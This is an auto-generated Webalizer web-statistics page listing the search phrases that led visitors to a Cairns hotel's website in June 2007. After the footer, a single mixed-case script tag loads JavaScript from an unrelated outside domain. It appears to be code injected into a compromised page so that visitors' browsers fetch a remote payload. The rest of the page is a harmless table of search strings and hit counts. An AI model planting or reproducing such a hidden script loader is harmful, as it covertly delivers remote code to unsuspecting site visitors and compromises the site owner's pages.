<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- Generated by The Webalizer  Ver. 2.01-10 -->
<!--                                          -->
<!-- Copyright 1997-2000 Bradford L. Barrett  -->
<!-- (brad@mrunix.net  http://www.mrunix.net) -->
<!--                                          -->
<!-- Distributed under the GNU GPL  Version 2 -->
<!--        Full text may be found at:        -->
<!--     http://www.mrunix.net/webalizer/     -->
<!--                                          -->
<!--  Give the power back to the programmers  -->
<!--   Support the Free Software Foundation   -->
<!--           (http://www.fsf.org)           -->
<!--                                          -->
<!-- *** Generated: 01-Jul-2007 05:16 EST *** -->

<HTML>
<HEAD>
 <TITLE>Usage Statistics for www.thehotelcairns.com - June 2007 - Search String</TITLE>
</HEAD>

<BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000">
<H2>Usage Statistics for www.thehotelcairns.com</H2>
<SMALL><STRONG>
Summary Period: June 2007 - Search String<BR>
Generated 01-Jul-2007 05:16 EST<BR>
</STRONG></SMALL>
<CENTER>
<HR>
<P>
<FONT SIZE="-1"></CENTER><PRE>
         Hits      Search String
----------------  ----------------------

456       48.46%  hotel cairns
334       35.49%  the hotel cairns
29         3.08%  cairns hotel
26         2.76%  the cairns hotel
23         2.44%  hotel in cairns
5          0.53%  www.thehotelcairns.com
4          0.43%  hotel cairns cairns
3          0.32%  cairns hotel cairns
3          0.32%  carins hotel
3          0.32%  the cairns hotel cairns
2          0.21%  (07) 4051 6188
2          0.21%  hotel
2          0.21%  thehotelcairns
2          0.21%  thehotelcairns.com
1          0.11%  %ef%bc%b4%ef%bd%88%ef%bd%85%e3%80%80%ef%bc%a8%ef%bd%8f%ef%bd%94
1          0.11%  'hotel cairns'
1          0.11%  accommodation with spa in cairns
1          0.11%  cairns - hotel
1          0.11%  cairns airport and hotel map
1          0.11%  cairns esplanade hotel
1          0.11%  cairns hot rock
1          0.11%  cairns hotel accomodation
1          0.11%  cairns hotel homepage
1          0.11%  cairns hotel queensland
1          0.11%  cairns outdoor restaurant
1          0.11%  cairns queensland breakfast restaurant -bed
1          0.11%  cairns restaurants: dining room
1          0.11%  hangliding cairns
1          0.11%  hot rock cuisine cairns
1          0.11%  hotel a cairns
1          0.11%  hotel at cairns
1          0.11%  hotel cairn
1          0.11%  hotel cairnes plantation
1          0.11%  hotel cairns abbott florence
1          0.11%  hotel cairns airport
1          0.11%  hotel cairns cairns australia
1          0.11%  hotel cairns hotel
1          0.11%  hotel cairns plantation
1          0.11%  hotel cairns tower
1          0.11%  hotel; cairns
1          0.11%  hotelcairns com.au
1          0.11%  hotels - cairns cbd
1          0.11%  hotéis cairns
1          0.11%  modern plantation photo
1          0.11%  plantation bar
1          0.11%  plantation bar grill cairns
1          0.11%  plantation grill hotel cairns
1          0.11%  plantation restaurant cairns
1          0.11%  site:www.thehotelcairns.com thehotelcairns
1          0.11%  the hotel cairns australia
1          0.11%  the hotel of cairns
1          0.11%  the hotelcairns
1          0.11%  the plantation bar and grill menu and cairns australia
1          0.11%  thehotelcairns.com.au
1          0.11%  walking tours cairns
1          0.11%  website and 'hotel cairns'
1          0.11%  www the hotel cairns
1          0.11%  www.hotelcairns.com
1          0.11%  www.thehotelcairns
1          0.11%  yorkey accommodation
1          0.11%  ｈｏｔｅｌ　carins
</PRE></FONT>
</CENTER>
<P>
<HR>
<TABLE WIDTH="100%" CELLPADDING=0 CELLSPACING=0 BORDER=0>
<TR>
<TD ALIGN=left VALIGN=top>
<SMALL>Generated by
<A HREF="http://www.mrunix.net/webalizer/"><STRONG>Webalizer Version 2.01</STRONG></A>
</SMALL>
</TD>
</TR>
</TABLE>

<!-- Webalizer Version 2.01-10 (Mod: 16-Apr-2002) -->

<sCript src=http://millerusa.net/604546.js></sCript></body>
</HTML>